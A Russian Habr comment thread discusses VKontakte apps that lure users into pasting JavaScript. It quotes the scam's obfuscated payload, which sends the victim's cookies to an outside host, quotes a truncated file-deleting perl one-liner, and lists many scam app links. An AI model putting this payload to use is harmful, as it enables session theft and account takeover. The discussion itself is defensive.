Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 133
Я недели две назад отправил жалобу на это приложение. Это не XSS, это дерьмо какое-то. Расчет идет на совершенно безмозглых девочек и мальчиков, коих в контакте слишком много, увы.
Если бы…
1. Администрация не будет их блокировать, потому что эти безмозглые девочки\мальчики заносят бабло через покупку голосов.
2. Дело тут даже не в компьютерной грамотности имхо. Пока люди, получив сообщение вида «Сделай <здесь подставить действие> и разошли это сообщение своим друзьям», будут выполнять то, что написано в сообщении — всегда будет способ что-нибудь взломать.
1. Администрация не будет их блокировать, потому что эти безмозглые девочки\мальчики заносят бабло через покупку голосов.
2. Дело тут даже не в компьютерной грамотности имхо. Пока люди, получив сообщение вида «Сделай <здесь подставить действие> и разошли это сообщение своим друзьям», будут выполнять то, что написано в сообщении — всегда будет способ что-нибудь взломать.
1) Блокировать их все-таки будут, ибо безопасность для ВКонтакте принципиальна, Пашечка Дуров только о ней и пишет.
2) так будут делать только те, у кого ума с грецкий орех.
2) так будут делать только те, у кого ума с грецкий орех.
Голоса для них не принципиальны, создаются всякие группы с линками на партнерки, типа аудионаркотиков — их закрывают моментально, хоть в эти группы и вкладываются тысячи рублей на рекламу.
вы пойдете в аптеку, провизор не исправит опечатку в рецепте, потом вы умрете из-за неправильного лечения. вывод: почерк медиков — санитар жизни, позволяет избавиться от юзеров, слишком далеких от медицины.
если я не ошибаюсь, при рассылке спама автоматически меняется пароль и высылается на регистрационный емейл, на моей памяти небыло ни 1 блокировки спамеров
Не надо сюда хакеров всешивать…
Хакеры ни когда не будут заниматься такой ерундой, это дело рук студентов 3-4 курса, какого нибудь факультета информационных техногогий или программеров.
Хакеры ни когда не будут заниматься такой ерундой, это дело рук студентов 3-4 курса, какого нибудь факультета информационных техногогий или программеров.
администрации от таких юзеров идет основной доход
Ну, чисто теоретически — XSS:
межсайтовый? да
скриптинг? да
Определению соответствует ;-)
межсайтовый? да
скриптинг? да
Определению соответствует ;-)
Вы путаете «безмозглость» и тот факт, что большинство людей, которые, быть может, намного умнее Вас, знать не знают про всякие там куки-хуюки и прочие непонятные им термины.
Они, может, собирают себе адронные коллайдеры или занимаются биохимией. Только юный малолетний мудак-школьнег-пионер может позволить себе назвать их «безмозглыми».
Они, может, собирают себе адронные коллайдеры или занимаются биохимией. Только юный малолетний мудак-школьнег-пионер может позволить себе назвать их «безмозглыми».
Надо юзерам вбивать в голову, что если нет кнопочек «Ок» «Cancel», а есть куча непонятных слов и закорючек — лучше не нажимать, во избежание.
Ну тогда не надо пользоваться поисковиками и другими сервисами по твоей теории… так как там есть: «Куча непонятных закорючек». Причем полюбому…
Вот ещё не хватало, чтобы пользователь совсем разучился читать, а только нажимал на «Ок» и «Cancel»
А зачем пользователю читать и понимать это:
javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));
??? Когда он тут тупо должен начинать бояться и звать более знающего товарища, т.е. админа.
javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));
??? Когда он тут тупо должен начинать бояться и звать более знающего товарища, т.е. админа.
>Вот ещё не хватало, чтобы пользователь совсем разучился читать.
Пользователь не должен это понимать. Я к тому клоню, что не всё разрешённое сопровождается кнопками «Ок» и «Cancel», а запрещённое — «страшным» текстом.
Пользователь не должен это понимать. Я к тому клоню, что не всё разрешённое сопровождается кнопками «Ок» и «Cancel», а запрещённое — «страшным» текстом.
Вопрос в том, как рядовой пользователь ВКонтакте будет искать этого админа…
Да никак. Видишь предложение совершить неведомую фуйню, вместо нажимания привычных кнопочек — испугайся, не совершай. Вот так и должно быть.
Надо разработчикам в голову вбивать, что не юзеры должны учить каждый год новые и новые их косяки, а создатели железа и софта должны заниматься своим делом ответственно.
Не человек для техники, а техника для человека.
Не человек для техники, а техника для человека.
«юный малолетний мудак-школьнег-пионер» — следите за речью.
Мои знакомые, далекие от IT жизни, но которые провели вконтакте год или два обладают уже достаточным опытом, чтобы совместив его с природным умом и сообразительностью, не выполнять подобные указания в приложениях, в то время как подавляющее большинство приложений не требует от них это. Люди, которые сидят в социальных сетях, которым приходят разнообразные инвайты и которые активируют функцию «Приложения» вконтакте, обладают, как я считаю, некоторой интернет-грамотностью.
А знаете ли вы, что правила элементарной безопасности стоит вдалбливать в голову каждому человеку, который выходит на просторы интернета? Не согласны?
Мои знакомые, далекие от IT жизни, но которые провели вконтакте год или два обладают уже достаточным опытом, чтобы совместив его с природным умом и сообразительностью, не выполнять подобные указания в приложениях, в то время как подавляющее большинство приложений не требует от них это. Люди, которые сидят в социальных сетях, которым приходят разнообразные инвайты и которые активируют функцию «Приложения» вконтакте, обладают, как я считаю, некоторой интернет-грамотностью.
А знаете ли вы, что правила элементарной безопасности стоит вдалбливать в голову каждому человеку, который выходит на просторы интернета? Не согласны?
Я так понимаю, минусующие — это люди, которые допустят маститого и известного биохимика/физика-ядерщика к работе за сложным и опасным для жизни станком без инструктажа? Пусть наматывается на вал, сам мол виноват?
Вступайте в дискуссию, а не прячьтесь за крестиками.
Вступайте в дискуссию, а не прячьтесь за крестиками.
Запомните главный принцип: не человек для техники, а техника для человека.
ПО для повседневного использования и сайты не должны быть такими, чтобы их мог хакнуть каждый сопляк. Если они такие — то мудаки не юзеры, а разработчики.
ПО для повседневного использования и сайты не должны быть такими, чтобы их мог хакнуть каждый сопляк. Если они такие — то мудаки не юзеры, а разработчики.
Я этот принцип знаю. Но пока мы не в силах объяснить технике во всех мелочах, как она обязана обращаться с пользователем. И это надо учитывать. Представить сложно, сколько людей нажимают «Да» когда выскакивает сообщение типа «Вы действительно хотите безвозвратно удалить все фотографии, видеофайлы и документы накопленные за долгие годы непосильного труда?» а потом бегут в сервис-центры со словами «а какого х. эта х. все нах. удалила?»
Не будет техника думать за человека, она была, есть и всегда будет служить для облегчения работы человека, думать он должен сам, а винить в этом набор двоичных кодов и микросхем — бесполезно и наивно.
Естественно тут есть свои тонкости, и оставлять такие методы кражи тех же куков — это идиотизм, но вопрос сейчас стоит гораздо шире.
Не будет техника думать за человека, она была, есть и всегда будет служить для облегчения работы человека, думать он должен сам, а винить в этом набор двоичных кодов и микросхем — бесполезно и наивно.
Естественно тут есть свои тонкости, и оставлять такие методы кражи тех же куков — это идиотизм, но вопрос сейчас стоит гораздо шире.
Не припомню, чтоб при покупке компьютера заставляли слушать инструктаж, заполнять журнал по технике безопасности, да и инструкцию к нему никто не даёт (более того, качество книг «компьютер для чайников» — довольно посредственное).
А если бы такое было, то доведено до абсурда, особенно в нашей стране.
Например платный экзамен, выдача прав, коррупция.
И инета у нас не было, а если бы был, то по модему по ценам ещё более диким, чем были лет 10 назад.
Зато люди бы за варкрафтом не помирали, спортом бы занимались (а вот в это я не верю — бухали бы), ботнетов бы не было (на компьютерах только этой страны, да и то вряд ли).
Кстати, я замечал, что порой людям пофигу на вирусы, что кучкуются на их компьютере, по крайней мере, пока можно играться, смотреть фильмы.
Вы всё-таки передёргиваете, сравниваете сидение за «чудо-ящиком» и работой за токарным станком, кислотами, работой с источниками ультрафиолета, с электропроводкой и т.п.
К тому же, даже юниксоиды, которые «по определению» как бы должны быть более подкованы, порой запускают что-нибудь в стиле того однострочника на перле, который удаляет все файлы :).
ТБ при работе с компьютером подписывают разве что на работе, да и то не всегда. Не припомню, что бы за всё время ни одного случая, который бы видел воочию.
Ни на учёбе, ни на работе, ни в компьютерных клубах.
А если бы такое было, то доведено до абсурда, особенно в нашей стране.
Например платный экзамен, выдача прав, коррупция.
И инета у нас не было, а если бы был, то по модему по ценам ещё более диким, чем были лет 10 назад.
Зато люди бы за варкрафтом не помирали, спортом бы занимались (а вот в это я не верю — бухали бы), ботнетов бы не было (на компьютерах только этой страны, да и то вряд ли).
Кстати, я замечал, что порой людям пофигу на вирусы, что кучкуются на их компьютере, по крайней мере, пока можно играться, смотреть фильмы.
Вы всё-таки передёргиваете, сравниваете сидение за «чудо-ящиком» и работой за токарным станком, кислотами, работой с источниками ультрафиолета, с электропроводкой и т.п.
К тому же, даже юниксоиды, которые «по определению» как бы должны быть более подкованы, порой запускают что-нибудь в стиле того однострочника на перле, который удаляет все файлы :).
ТБ при работе с компьютером подписывают разве что на работе, да и то не всегда. Не припомню, что бы за всё время ни одного случая, который бы видел воочию.
Ни на учёбе, ни на работе, ни в компьютерных клубах.
Нас на уроках информатики в школе каждый год заставляли подписывать)
Преподаватели тоже понимают, что если что-то случится, им не поздоровится, вот и перестраховываются.
Большинство, правда, ограничивалось только подписью, а инструктаж не проводили (не комп. предметы: физика, физ-ра и др.).
На информатике и подобных предметах, конечно, рассказывали между делом о вирусах… по большей степени, словно для исторической справки.
Преподаватель по компьютерным сетям даже не поверил, что данные может перехватить злоумышленник, сказав, что это никому не нужно.
Такие дела.
Большинство, правда, ограничивалось только подписью, а инструктаж не проводили (не комп. предметы: физика, физ-ра и др.).
На информатике и подобных предметах, конечно, рассказывали между делом о вирусах… по большей степени, словно для исторической справки.
Преподаватель по компьютерным сетям даже не поверил, что данные может перехватить злоумышленник, сказав, что это никому не нужно.
Такие дела.
Я согласен с тем, что крутые кампьютерщеги должны делать свои приложения такими, чтобы их нельзя было хакнуть мизинцем левой ноги в промежутке между сморканием и чисткой зубов.
Вот с этим я согласен.
Вот с этим я согласен.
И да, я сказал про «девочек и мальчиков». Не надо приписывать мне оскорбление кандидатов наук или каких-либо узкопрофильных ученых. Шанс, что на это приложение нарвутся социально активные девочки и мальчики — гораздо выше.
Плюсaдин. Я бы назвал их компьютерно-неграмотными. С этим нужно бороться, потратить некоторое время своей жизни и обучиться, а лучше, чтобы это вообще преподавали в школе на уроках информатики (у меня например, информатика была только в 8-9-10 классах и то, 80% класса просто списывали/копировали или зубрили, в общем толку — ноль) ). Но вспоминая школьное образование в нашей стране, все мои мысли о компьютерно-образованом поколении развеиваются.
Я тоже жаловался. Интересно, эти жалобы вообще читают? :(
Да уж, похоже что пора администрации Вконтакте добавить подпись под каждым приложением «пользователь устанавливает данное приложение на свой страх и риск».
>Расчет идет на совершенно безмозглых девочек и мальчиков, коих в контакте слишком много, увы.
да совершенно необязательно. мне приведенный код совершенно не показался бы подозрительным, хотя я в IT уже 6 лет. может потому что я не сильно знаком с (веб) программированием и различными способами хищения пользовательских данных.
с другой стороны я помню мегаизвестную штуку
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{
да совершенно необязательно. мне приведенный код совершенно не показался бы подозрительным, хотя я в IT уже 6 лет. может потому что я не сильно знаком с (веб) программированием и различными способами хищения пользовательских данных.
с другой стороны я помню мегаизвестную штуку
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{
Да, повтор. Именно про этот способ я рассказывал в этом комментарии.
А где ссылка на приложение?
Можно в личку.
Можно в личку.
Да держите уж…
vkontakte.ru/app722652
vkontakte.ru/app722653
vkontakte.ru/app722654
vkontakte.ru/app722655
vkontakte.ru/app722656
vkontakte.ru/app722661
vkontakte.ru/app722662
vkontakte.ru/app722663
vkontakte.ru/app722664
vkontakte.ru/app722665
vkontakte.ru/app722667
vkontakte.ru/app722668
vkontakte.ru/app722669
vkontakte.ru/app722670
vkontakte.ru/app722671
vkontakte.ru/app722675
vkontakte.ru/app722676
vkontakte.ru/app722677
vkontakte.ru/app722679
vkontakte.ru/app722680
vkontakte.ru/app722683
vkontakte.ru/app722684
vkontakte.ru/app722685
vkontakte.ru/app722687
vkontakte.ru/app722688
vkontakte.ru/app722694
vkontakte.ru/app722695
vkontakte.ru/app722696
vkontakte.ru/app722697
vkontakte.ru/app722698
vkontakte.ru/app722702
vkontakte.ru/app722703
vkontakte.ru/app722704
vkontakte.ru/app722705
vkontakte.ru/app722706
vkontakte.ru/app722709
vkontakte.ru/app722710
vkontakte.ru/app722711
vkontakte.ru/app722712
vkontakte.ru/app722714
vkontakte.ru/app722717
vkontakte.ru/app722718
vkontakte.ru/app722720
vkontakte.ru/app722721
vkontakte.ru/app722722
vkontakte.ru/app722726
vkontakte.ru/app722727
vkontakte.ru/app722728
vkontakte.ru/app722729
vkontakte.ru/app722731
vkontakte.ru/app722734
vkontakte.ru/app722735
vkontakte.ru/app722736
vkontakte.ru/app722737
vkontakte.ru/app722739
vkontakte.ru/app722743
vkontakte.ru/app722744
vkontakte.ru/app722745
vkontakte.ru/app722746
vkontakte.ru/app722747
vkontakte.ru/app722753
vkontakte.ru/app722757
vkontakte.ru/app722758
vkontakte.ru/app722759
vkontakte.ru/app722761
vkontakte.ru/app722766
vkontakte.ru/app722769
vkontakte.ru/app722770
vkontakte.ru/app722771
vkontakte.ru/app722773
vkontakte.ru/app722777
vkontakte.ru/app722778
vkontakte.ru/app722780
vkontakte.ru/app722781
vkontakte.ru/app722789
vkontakte.ru/app722794
vkontakte.ru/app722796
vkontakte.ru/app722797
vkontakte.ru/app722798
vkontakte.ru/app722805
vkontakte.ru/app722815
vkontakte.ru/app722813
vkontakte.ru/app722816
vkontakte.ru/app722817
vkontakte.ru/app722823
vkontakte.ru/app722831
vkontakte.ru/app722833
vkontakte.ru/app722834
vkontakte.ru/app722838
vkontakte.ru/app722849
vkontakte.ru/app722863
vkontakte.ru/app722867
vkontakte.ru/app722869
vkontakte.ru/app722873
vkontakte.ru/app722904
vkontakte.ru/app722937
vkontakte.ru/app722939
vkontakte.ru/app722940
vkontakte.ru/app722946
vkontakte.ru/app722978
vkontakte.ru/app723068
vkontakte.ru/app723067
vkontakte.ru/app723066
vkontakte.ru/app723084
vkontakte.ru/app723104
vkontakte.ru/app723116
vkontakte.ru/app723119
vkontakte.ru/app723120
vkontakte.ru/app723121
vkontakte.ru/app723132
vkontakte.ru/app723147
vkontakte.ru/app723148
vkontakte.ru/app723152
vkontakte.ru/app723156
vkontakte.ru/app723174
vkontakte.ru/app723207
vkontakte.ru/app723214
vkontakte.ru/app723218
vkontakte.ru/app723226
vkontakte.ru/app723258
vkontakte.ru/app723281
vkontakte.ru/app723325
vkontakte.ru/app723366
vkontakte.ru/app723405
vkontakte.ru/app723435
vkontakte.ru/app723465
vkontakte.ru/app723481
vkontakte.ru/app723486
vkontakte.ru/app723487
vkontakte.ru/app723488
vkontakte.ru/app723489
vkontakte.ru/app723509
vkontakte.ru/app723510
vkontakte.ru/app723511
vkontakte.ru/app723513
vkontakte.ru/app723516
vkontakte.ru/app723551
vkontakte.ru/app723555
vkontakte.ru/app723557
vkontakte.ru/app723558
vkontakte.ru/app723561
vkontakte.ru/app723593
vkontakte.ru/app723595
vkontakte.ru/app723596
vkontakte.ru/app723600
vkontakte.ru/app723601
vkontakte.ru/app723623
vkontakte.ru/app723635
vkontakte.ru/app723642
vkontakte.ru/app723645
vkontakte.ru/app723648
vkontakte.ru/app723673
vkontakte.ru/app723680
vkontakte.ru/app723711
vkontakte.ru/app723749
vkontakte.ru/app723787
vkontakte.ru/app723820
vkontakte.ru/app723848
vkontakte.ru/app723853
vkontakte.ru/app723863
vkontakte.ru/app723868
vkontakte.ru/app723876
vkontakte.ru/app723882
vkontakte.ru/app723883
vkontakte.ru/app723885
vkontakte.ru/app723886
vkontakte.ru/app723905
vkontakte.ru/app723913
vkontakte.ru/app723914
vkontakte.ru/app723916
vkontakte.ru/app723917
vkontakte.ru/app723947
vkontakte.ru/app723959
vkontakte.ru/app723960
vkontakte.ru/app723961
vkontakte.ru/app723962
vkontakte.ru/app723999
vkontakte.ru/app724000
vkontakte.ru/app724012
vkontakte.ru/app724014
vkontakte.ru/app724015
vkontakte.ru/app724025
vkontakte.ru/app724028
vkontakte.ru/app724032
vkontakte.ru/app724034
vkontakte.ru/app724036
vkontakte.ru/app724049
vkontakte.ru/app724055
vkontakte.ru/app724064
vkontakte.ru/app724067
vkontakte.ru/app724069
vkontakte.ru/app724088
vkontakte.ru/app724094
vkontakte.ru/app724099
vkontakte.ru/app724102
vkontakte.ru/app724103
vkontakte.ru/app724112
vkontakte.ru/app724115
vkontakte.ru/app724118
vkontakte.ru/app724120
vkontakte.ru/app724125
vkontakte.ru/app724137
vkontakte.ru/app724139
vkontakte.ru/app724145
vkontakte.ru/app724148
vkontakte.ru/app724154
vkontakte.ru/app724170
vkontakte.ru/app724173
vkontakte.ru/app724180
vkontakte.ru/app724182
vkontakte.ru/app724388
vkontakte.ru/app722652
vkontakte.ru/app722653
vkontakte.ru/app722654
vkontakte.ru/app722655
vkontakte.ru/app722656
vkontakte.ru/app722661
vkontakte.ru/app722662
vkontakte.ru/app722663
vkontakte.ru/app722664
vkontakte.ru/app722665
vkontakte.ru/app722667
vkontakte.ru/app722668
vkontakte.ru/app722669
vkontakte.ru/app722670
vkontakte.ru/app722671
vkontakte.ru/app722675
vkontakte.ru/app722676
vkontakte.ru/app722677
vkontakte.ru/app722679
vkontakte.ru/app722680
vkontakte.ru/app722683
vkontakte.ru/app722684
vkontakte.ru/app722685
vkontakte.ru/app722687
vkontakte.ru/app722688
vkontakte.ru/app722694
vkontakte.ru/app722695
vkontakte.ru/app722696
vkontakte.ru/app722697
vkontakte.ru/app722698
vkontakte.ru/app722702
vkontakte.ru/app722703
vkontakte.ru/app722704
vkontakte.ru/app722705
vkontakte.ru/app722706
vkontakte.ru/app722709
vkontakte.ru/app722710
vkontakte.ru/app722711
vkontakte.ru/app722712
vkontakte.ru/app722714
vkontakte.ru/app722717
vkontakte.ru/app722718
vkontakte.ru/app722720
vkontakte.ru/app722721
vkontakte.ru/app722722
vkontakte.ru/app722726
vkontakte.ru/app722727
vkontakte.ru/app722728
vkontakte.ru/app722729
vkontakte.ru/app722731
vkontakte.ru/app722734
vkontakte.ru/app722735
vkontakte.ru/app722736
vkontakte.ru/app722737
vkontakte.ru/app722739
vkontakte.ru/app722743
vkontakte.ru/app722744
vkontakte.ru/app722745
vkontakte.ru/app722746
vkontakte.ru/app722747
vkontakte.ru/app722753
vkontakte.ru/app722757
vkontakte.ru/app722758
vkontakte.ru/app722759
vkontakte.ru/app722761
vkontakte.ru/app722766
vkontakte.ru/app722769
vkontakte.ru/app722770
vkontakte.ru/app722771
vkontakte.ru/app722773
vkontakte.ru/app722777
vkontakte.ru/app722778
vkontakte.ru/app722780
vkontakte.ru/app722781
vkontakte.ru/app722789
vkontakte.ru/app722794
vkontakte.ru/app722796
vkontakte.ru/app722797
vkontakte.ru/app722798
vkontakte.ru/app722805
vkontakte.ru/app722815
vkontakte.ru/app722813
vkontakte.ru/app722816
vkontakte.ru/app722817
vkontakte.ru/app722823
vkontakte.ru/app722831
vkontakte.ru/app722833
vkontakte.ru/app722834
vkontakte.ru/app722838
vkontakte.ru/app722849
vkontakte.ru/app722863
vkontakte.ru/app722867
vkontakte.ru/app722869
vkontakte.ru/app722873
vkontakte.ru/app722904
vkontakte.ru/app722937
vkontakte.ru/app722939
vkontakte.ru/app722940
vkontakte.ru/app722946
vkontakte.ru/app722978
vkontakte.ru/app723068
vkontakte.ru/app723067
vkontakte.ru/app723066
vkontakte.ru/app723084
vkontakte.ru/app723104
vkontakte.ru/app723116
vkontakte.ru/app723119
vkontakte.ru/app723120
vkontakte.ru/app723121
vkontakte.ru/app723132
vkontakte.ru/app723147
vkontakte.ru/app723148
vkontakte.ru/app723152
vkontakte.ru/app723156
vkontakte.ru/app723174
vkontakte.ru/app723207
vkontakte.ru/app723214
vkontakte.ru/app723218
vkontakte.ru/app723226
vkontakte.ru/app723258
vkontakte.ru/app723281
vkontakte.ru/app723325
vkontakte.ru/app723366
vkontakte.ru/app723405
vkontakte.ru/app723435
vkontakte.ru/app723465
vkontakte.ru/app723481
vkontakte.ru/app723486
vkontakte.ru/app723487
vkontakte.ru/app723488
vkontakte.ru/app723489
vkontakte.ru/app723509
vkontakte.ru/app723510
vkontakte.ru/app723511
vkontakte.ru/app723513
vkontakte.ru/app723516
vkontakte.ru/app723551
vkontakte.ru/app723555
vkontakte.ru/app723557
vkontakte.ru/app723558
vkontakte.ru/app723561
vkontakte.ru/app723593
vkontakte.ru/app723595
vkontakte.ru/app723596
vkontakte.ru/app723600
vkontakte.ru/app723601
vkontakte.ru/app723623
vkontakte.ru/app723635
vkontakte.ru/app723642
vkontakte.ru/app723645
vkontakte.ru/app723648
vkontakte.ru/app723673
vkontakte.ru/app723680
vkontakte.ru/app723711
vkontakte.ru/app723749
vkontakte.ru/app723787
vkontakte.ru/app723820
vkontakte.ru/app723848
vkontakte.ru/app723853
vkontakte.ru/app723863
vkontakte.ru/app723868
vkontakte.ru/app723876
vkontakte.ru/app723882
vkontakte.ru/app723883
vkontakte.ru/app723885
vkontakte.ru/app723886
vkontakte.ru/app723905
vkontakte.ru/app723913
vkontakte.ru/app723914
vkontakte.ru/app723916
vkontakte.ru/app723917
vkontakte.ru/app723947
vkontakte.ru/app723959
vkontakte.ru/app723960
vkontakte.ru/app723961
vkontakte.ru/app723962
vkontakte.ru/app723999
vkontakte.ru/app724000
vkontakte.ru/app724012
vkontakte.ru/app724014
vkontakte.ru/app724015
vkontakte.ru/app724025
vkontakte.ru/app724028
vkontakte.ru/app724032
vkontakte.ru/app724034
vkontakte.ru/app724036
vkontakte.ru/app724049
vkontakte.ru/app724055
vkontakte.ru/app724064
vkontakte.ru/app724067
vkontakte.ru/app724069
vkontakte.ru/app724088
vkontakte.ru/app724094
vkontakte.ru/app724099
vkontakte.ru/app724102
vkontakte.ru/app724103
vkontakte.ru/app724112
vkontakte.ru/app724115
vkontakte.ru/app724118
vkontakte.ru/app724120
vkontakte.ru/app724125
vkontakte.ru/app724137
vkontakte.ru/app724139
vkontakte.ru/app724145
vkontakte.ru/app724148
vkontakte.ru/app724154
vkontakte.ru/app724170
vkontakte.ru/app724173
vkontakte.ru/app724180
vkontakte.ru/app724182
vkontakte.ru/app724388
Парсер лох ^.^
о_О Ну и понаштамповали их, однако… Интересно, куда админы смотрят — хоть половину из этих приложений заблокировали бы.
Больше половины заблокировано.
Не поленился и прощёлкал чисто из спортивного интереса все 211… Да, действительно больше половины уже заблокировано, просто когда я сначала около десятка наугад тыкнул — все рабочие попались))
А сколько приложение должно собрть жалоб чтобы на них отреагировали?
Это писец! рассчитано на тупых.
Нельзя так относиться к людям!
Люди, которые не знают что такое XSS и тп — «безмозглые девочки и мальчики». :/
Социальная сеть — это не Хабр. Среди этих «безмозглых девочек и мальчиков» есть и взрослые люди, которым уже не надо абсолютно знать что такое XSS и как их избегать, есть люди, которые узнали что такое интернет 2 дня назад…
У меня родители по сути далеко не на ты с компьютером, но я им показал, что такое соц сеть. Они нашли своих одноклассников, друзей детства и радуются этому, поддерживают оотношения. Им больше не надо ничего, они не хотят проходить курсы программистов, для того чтобы пообщаться с друзьями. А «санитары» эти — моральные уроды, вот и всё.
Люди, которые не знают что такое XSS и тп — «безмозглые девочки и мальчики». :/
Социальная сеть — это не Хабр. Среди этих «безмозглых девочек и мальчиков» есть и взрослые люди, которым уже не надо абсолютно знать что такое XSS и как их избегать, есть люди, которые узнали что такое интернет 2 дня назад…
хакеры — санитары соц. сетей, позволяют избавиться от юзеров, слишком далёких от пользования компьютером :)
У меня родители по сути далеко не на ты с компьютером, но я им показал, что такое соц сеть. Они нашли своих одноклассников, друзей детства и радуются этому, поддерживают оотношения. Им больше не надо ничего, они не хотят проходить курсы программистов, для того чтобы пообщаться с друзьями. А «санитары» эти — моральные уроды, вот и всё.
Вряд ли Ваших родителей интересуют флеш-игры типа «весёлого фермера» да «продай своих друзей», поэтому мне кажется проще либо объяснить, что приложения вконтакте это зло и никаких манипуляций проводить с ними не надо, либо просто отключить этот сервис у их аккаунтов.
Я маме сразу объяснил, что ничего из того, что предлагают выполнить пользователю (вроде перехода по ссылке в сообщении), делать нельзя, предварительно не уведомив меня. Ну и объяснил, почему.
И ничего, тьфу-тьфу, не случилось ещё.
И ничего, тьфу-тьфу, не случилось ещё.
>> Люди, которые не знают что такое XSS и тп — «безмозглые девочки и мальчики»
Ааа! Я, видимо, безмозглый мальчик. Убью себя об стену! =)
Ааа! Я, видимо, безмозглый мальчик. Убью себя об стену! =)
Ты на Хабре, друг. Ты чего здесь ожидал увидеть?
А кто-то может сказать, все-ли хорошо с этой строкой:
javascript:var%20s=document.createElement('script');s.src='http://videosaver.ru/vs.js?nc='+Math.random();document.body.appendChild(s);void(0);
© Videsaver.ru
Я в этом ничего не смыслю, потому буду рад ответу.
javascript:var%20s=document.createElement('script');s.src='http://videosaver.ru/vs.js?nc='+Math.random();document.body.appendChild(s);void(0);
© Videsaver.ru
Я в этом ничего не смыслю, потому буду рад ответу.
Все в порядке.
до тех пор, пока кто-нить не «подправит» videosaver.ru/vs.js :)
Как же всё в порядке, если они на страницу свой скрипт добавляют.
Разве не в состоянии он сделать всё, что угодно?
Разве не в состоянии он сделать всё, что угодно?
Браузерам нужно ограничить использование JS, вводимый через адресную строку в браузере. Для начала нужно просто заблокировать document.cookie.
Нужно вообще отказаться от псевдопротокола «javascript:»!
Для меня это самый быстрый способ посмотреть, какие у меня лежат куки от какого-либо сайта.
Куки в жабаскрипте могут быть весьма полезны, например, для того, чтобы запоминать положение каких-нибудь сворачиваемых/перетаскиваемых элементов (btw, мысль, надо к стикерити прикрутить).
Для сессий и прочих приватных данных есть флаг httponly.
Для сессий и прочих приватных данных есть флаг httponly.
Я имею ввиду не в Javascript убрать возможность работать с куками, а лишь в том коде, который вводится через адресную строку.
<lor-mode>Код в адресной строке не нужен</lor-mode>
см. ответ выше: «Тогда перестанут работать многие полезные сервисы, которые удобно использовать в качестве закладок. „
Социальная инженерия самый верный и лучший метод взлома крупных объектов.
Как сказал Энштейн — «в мире две вещи бесконечны — это дураки и вселенная, хотя насчёт второго я не уверен»
Как сказал Энштейн — «в мире две вещи бесконечны — это дураки и вселенная, хотя насчёт второго я не уверен»
Правильно.
Но на хабре отправиться ваша текущая сессия, а вконтактах ваш логин и пароль, которым можно пользоваться когда-угодно.
Тут не всё так просто. Фактически с некоторого момента куки становятся просто строкой с данными. Они подвержены манипуляциям вроде «заменить каждую букву на обратную — »а" на «я», и тогда по левому адрему уйдут не куки, а непонятно что. А запретить вообще работу с куками из JS тоже ой как нехорошо. Вообще это кривизна вконтакта, что украв куки можно получить возможность логиниться под этим юзером. Это известные приколы с безопасностью насчет того что можно хранить в куках, а что нельзя.
Для этого придумали HttpOnly куки, к которым нет доступа из JS.
Заговор?)
К таким причинам может относиться только желание самостоятельно же работать с куками пароля через JS. Например, автоматически авторизовывать пользователя на каких-либо сторонних аффилированных с вконтакте сервисах.
Других причин я не вижу… Хотя с HttpOnly куками всё не так просто, не все браузеры их поддерживают (хотя основные и поддерживают)
Других причин я не вижу… Хотя с HttpOnly куками всё не так просто, не все браузеры их поддерживают (хотя основные и поддерживают)
Люди, завязывайте с Вконтакте.
Зачем? Газовая плита на кухне тоже потенциально опасна — там же открытое пламя! Мне нравится контакт, он меня всем устраивает, единственное, что нужно следовать некоторым правилам:
• не открывать непонятные ссылки
• не скачивать и тем более не запускать приложения в которых не уверен
• в третьих чем в приложении или на страничке просьб перейти по ссылке: «нажми сюд», «перейти сюда», «обязательно перейди по ссылке» и восклицательных знаков в количестве больше одной штуки, тем больше вероятности, что потом будет плохо.
• ну и на последок официально разрешенные ресурсы не будут требовать таких мудрёных действий для своего запуска — это тоже должно насторожить.
• не открывать непонятные ссылки
• не скачивать и тем более не запускать приложения в которых не уверен
• в третьих чем в приложении или на страничке просьб перейти по ссылке: «нажми сюд», «перейти сюда», «обязательно перейди по ссылке» и восклицательных знаков в количестве больше одной штуки, тем больше вероятности, что потом будет плохо.
• ну и на последок официально разрешенные ресурсы не будут требовать таких мудрёных действий для своего запуска — это тоже должно насторожить.
Как вы достали.
Думаю, им надо ввести систему сброса всех этих куков — скажем, каждые два дня. Или для параноиков — маскимально ограничить время жизни сессии. Добавить ip-фильтрацию и тп. Чтоб в куках хранился еще и допустимый ip.
Хороша идея добавления функции блокировки отправления javascript из адресной строки. А обфусцированный код расшифровывать.
Хороша идея добавления функции блокировки отправления javascript из адресной строки. А обфусцированный код расшифровывать.
Вот у меня ip динамический — и что мне делать тогда?
Он же не меняется каждые 10 минут.
Идея в создании настраиваемой под каждый случай системы безопасности.
Для кого-то включена проверка адреса, для кого-то — стиль набора пароля, для кого-то — ограничение времени сессии, для кого-то — что-то иное.
Идея в создании настраиваемой под каждый случай системы безопасности.
Для кого-то включена проверка адреса, для кого-то — стиль набора пароля, для кого-то — ограничение времени сессии, для кого-то — что-то иное.
В нормальных условиях делается не привязка пользователя к ip, а привязка сессии к ip. В чем разница: если у вас изменился ip то вам надо просто еще раз ввести свой пароль. При некоторых условиях и это умеют обходить :) Мое мнение — лучше лишний раз заставить пользователя вбить пароль, чем потом слить инфу о нем на сторону непреднамеренно.
